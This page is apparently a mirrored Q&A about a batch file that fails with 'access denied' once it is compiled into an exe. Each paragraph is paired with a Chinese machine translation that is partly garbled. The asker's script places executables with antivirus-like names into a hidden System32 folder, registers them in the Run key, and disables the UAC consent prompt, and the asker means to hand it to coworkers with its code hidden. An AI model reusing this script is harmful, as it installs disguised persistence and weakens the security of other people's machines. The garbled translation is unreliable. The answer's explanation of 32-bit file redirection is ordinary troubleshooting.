具有批处理文件的烦恼 [英] Having troubles with batch files
问题描述
此问题是吃了我的大脑。我有一个简单的批处理文件,这使得一个目录%SYSTEMROOT%只有当它不存在&功放;拷贝某些文件到该目录,添加属性 + S + R + H 对他们来说,增加了两个程序通过注册表启动和禁用UAC,因为我需要它常常像3X天。它的工作原理以及一个批处理文件,但我想它分发给我的同胞队友公司。我们都正在这一场比赛,所以我也不需要他们看到我的code;我知道,如果我仍然在批量脚本的水平比我的code是不值得复制,但我的队友们也不会亮的灯泡!
This issue is eating my brains of. I have a simple batch file which makes a directory in %SYSTEMROOT% only if it does not exist & copies certain files to that directory, adds the attribute +S +R +H to them, adds two programs to startup via registry and disables UAC as I need it frequently like 3x day. It works well as a batch file but I want to distribute it to my fellow company mates. We all are having a competition in this so I do not need them to see my code; I know if I am still at the level of batch scripting than my code is not worth copying but my mates are also not the brightest bulbs!
我的问题是,当我把它转换使用到exe 快速批量转换器作为瞬间就变成它开始给一个exe 拒绝访问误差只有当它到达文件%SYSTEMROOT%复制即使我运行它以管理员身份和禁用UAC命令,这是<$ C $ C> C:\\ WINDOWS \\ SYSTEM32 \\ CMD.EXE / K%WINDIR%\\ SYSTEM32 \\ REG.EXE ADD HKLM \\ SOFTWARE \\微软\\的Windows \\ CurrentVersion \\政策\\ SYSTEM / v ConsentPromptBehaviorAdmin /吨REG_DWORD /天0 /˚F的作品,其中,原本应该需要管理员权限。当转换成EXE其唯一的的,让访问文件复制拒绝。他们都只是正常工作,如果它是在batch.I的形式知道这可能是题外话,但我怀疑的批处理文件犯规动作,而不是快速批量转换因为我已经转换使用该转换多个文件的他们的工作完美无瑕。
My issue is that when I convert it to exe using Quick Batch Convertor as the moment it becomes an exe it starts giving Access denied error only when It gets to copy the files in %SYSTEMROOT% even though I am running it as administrator and the disabling UAC command, which is C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f works, which, originally should require admin privileges. Its only the the copying of files that give access denied when converted into exe. They all just work fine if it is in a form of batch.I know that this might be off topic but I suspect foul play on the batch file and not the Quick Batch Converter because I have converted many files using this converter an they worked flawless.
在code为我批是在这里
The code for my batch is here
@echo off
echo %CD%
cd %~dp0
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Update" /t REG_SZ /d "\"C:\Windows\System32\SystemSettingsUpdate\HL~Realtime~Defense.exe\" " /f
Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Antivirus-Update " /t REG_SZ /d "\"C:\Windows\System32\SystemSettingsUpdate\Configure.exe\" " /f
if not exist "%SYSTEMROOT%\system32\SystemSettingsUpdate" mkdir %SYSTEMROOT%\system32\SystemSettingsUpdate
cd %~dp0
taskkill /f /im configure.exe
copy "%~dp0HL~Realtime~Defense.exe" "%SYSTEMROOT%\system32\SystemSettingsUpdate"
copy "%~dp0Whatsapp,Inc.exe" "%SYSTEMROOT%\system32\SystemSettingsUpdate"
copy "%~dp0Configure.exe" "%SYSTEMROOT%\system32\SystemSettingsUpdate"
ATTRIB +H -R +S %SYSTEMROOT%\system32\SystemSettingsUpdate\Configure.exe
ATTRIB +H -R +S %SYSTEMROOT%\system32\SystemSettingsUpdate\Whatsapp,Inc.exe
ATTRIB +H -R +S %SYSTEMROOT%\system32\SystemSettingsUpdate\HL~Realtime~Defense.exe
C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
exit
有什么建议?
推荐答案
这答案不能解决你的问题。它的目标用户中的编译的脚本奇怪的异常行为的解释。
描述的问题不解决的这个32位快速批处理文件编译器。为了证明这一点,创建一个批处理脚本 battoexeTest.bat 包含
This answer does not resolve your problem; it's intended for explanation of strangely unusual behaviour of compiled script.
Described issue is not solvable with this 32-bit Quick Batch File Compiler. For proof, create a batch script battoexeTest.bat containing
@ECHO OFF
SETLOCAL EnableExtensions
set t|find /I "system"
for /F "delims=" %%G in ('
wmic process Where "caption='cmd.exe' and not CommandLine like '%%%%wmic%%%%'" get CommandLine^,ExecutablePath /value
') do for /F "delims=" %%g in ("%%~G") do echo(%%~g
pause
输出(高架;请注意,我已经重定向用户的%TEMP%和%TMP%变量):
TEMP=D:\tempUser\SYSTEM
TMP=D:\tempUser\SYSTEM
CommandLine="C:\Windows\System32\cmd.exe" /C "D:\bat\battoexeTest.bat"
ExecutablePath=C:\Windows\System32\cmd.exe
如果你运行上面的脚本的编译版本 batToExeTestY.exe 升高,输出会改变如下:
If you run compiled version of above script batToExeTestY.exe elevated, output would change as follows:
TEMP=D:\tempUser\SYSTEM
TMP=D:\tempUser\SYSTEM
CommandLine=cmd.exe /c ""D:\tempUser\SYSTEM\8YQTO48H.bat" "D:\bat\batToExeTestY.exe" "
ExecutablePath=C:\Windows\SysWOW64\cmd.exe
您可以看到,
-
batToExeTestY.exe创建原始批处理脚本,在临时目录中的某些随机名称8YQTO48H.bat副本帐户系统,见的CommandLine; - 运行在
32位命令行的批处理文件,请参阅ExecutablePath。 - 因此,32位数证实。
batToExeTestY.execreates a copy of original batch script with some random name8YQTO48H.batin temporary directory of accountSYSTEM, seeCommandLine;- runs that batch file in
32bitcommand line, seeExecutablePath. - hence, 32-bitness proved.
Read File System Redirector chapter in MSDN article Running 32-bit Applications:
的%WINDIR%\\ SYSTEM32 目录保留用于64位应用程序。
...在大多数情况下,每当一个32位应用程序尝试访问
%WINDIR%\\ SYSTEM32 ,访问被重定向到%WINDIR%\\ Syswow64资料 ...
The
%windir%\System32directory is reserved for 64-bit applications. … In most cases, whenever a 32-bit application attempts to access%windir%\System32, the access is redirected to%windir%\SysWOW64…
例如:运行 ATTRIB 下的 64位的命令行提示符的( C:\\ WINDOWS \\ SYSTEM32 \\键入cmd。 exe文件)不管升高与否:
Example: run attrib under 64-bit command line prompt (C:\Windows\system32\cmd.exe) regardless of elevated or not:
==> attrib "%SYSTEMROOT%\sysWOW64\SystemSettingsUpdate\*.*"
A R C:\Windows\sysWOW64\SystemSettingsUpdate\WOW-cliParser.exe
A C:\Windows\sysWOW64\SystemSettingsUpdate\WOW-HL~Realtime~Defense.txt
==> attrib "%SYSTEMROOT%\system32\SystemSettingsUpdate\*.*"
A C:\Windows\system32\SystemSettingsUpdate\cliParser.exe
A SHR C:\Windows\system32\SystemSettingsUpdate\HL~Real~Def.txt
如果您运行 ATTRIB 或 DIR 下的 32位的命令行提示符的,那么WOW重定向
If you run attrib or dir under 32-bit command line prompt, then WOW redirector
- 显示
C:\\ WINDOWS \\ SYSTEM32 \\ SystemSettingsUpdate文件目录虽然 - 显示位于
%SYSTEMROOT%文件\\ SYSWOW64 \\ SystemSettingsUpdate之一。
- displays
C:\Windows\system32\SystemSettingsUpdatefile directory although - shows files located in
%SYSTEMROOT%\sysWOW64\SystemSettingsUpdateone.
请看下图:
==> %windir%\SysWoW64\cmd.exe /C attrib "%SYSTEMROOT%\system32\SystemSettingsUpdate\*.*"
A R C:\Windows\system32\SystemSettingsUpdate\WOW-cliParser.exe
A C:\Windows\system32\SystemSettingsUpdate\WOW-HL~Realtime~Defense.txt
==> %windir%\SysWoW64\cmd.exe /C dir /A "%SYSTEMROOT%\system32\SystemSettingsUpdate\*.*"|find ":"
Directory of C:\Windows\system32\SystemSettingsUpdate
01.03.2016 12:25 <DIR> .
01.03.2016 12:25 <DIR> ..
01.03.2015 12:31 5 120 WOW-cliParser.exe
26.02.2016 08:54 84 WOW-HL~Realtime~Defense.txt
此外,试图运行批处理脚本(稍微适应用于测试目的,然后编译)升高,但 AVG互联网安全旗舰版的在抱怨它的居民盾的:
"Trojan horse Pakes_c.BWYN, d:\bat\batToExeTest.exe";"Secured";"25. 2. 2016, 22:50:52";"File or Directory";"c:\Program Files (x86)\Abyssmedia\Quick Batch File Compiler\quickbfc.exe"
和复制%〜dp0XYZ.exe%SYSTEMROOT%\\ SYSTEM32 \\ SystemSettingsUpdate行和/或 ATTRIB 在其行的身份保护的模块:
and on copy "%~dp0XYZ.exe" "%SYSTEMROOT%\system32\SystemSettingsUpdate" line and/or on attrib lines in its Identity Protection module:
"IDP.ALEXA.51, D:\tempUser\SYSTEM\8W88ULA2.bat";"Secured";"26. 2. 2016, 8:35:14";"File or Directory";""
"Unknown, D:\tempUser\SYSTEM\0G8KOWPT.bat";"Secured";"26. 2. 2016, 1:08:25";"File or Directory";""
可能是假阳性,但你绝对需要使用一些无病毒和 64位兼容蝙蝠到exe转换器...
Could be a false positive, but you definitely need to use some virus-free and 64-bit-compliant bat to exe converter…
这篇关于具有批处理文件的烦恼的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!
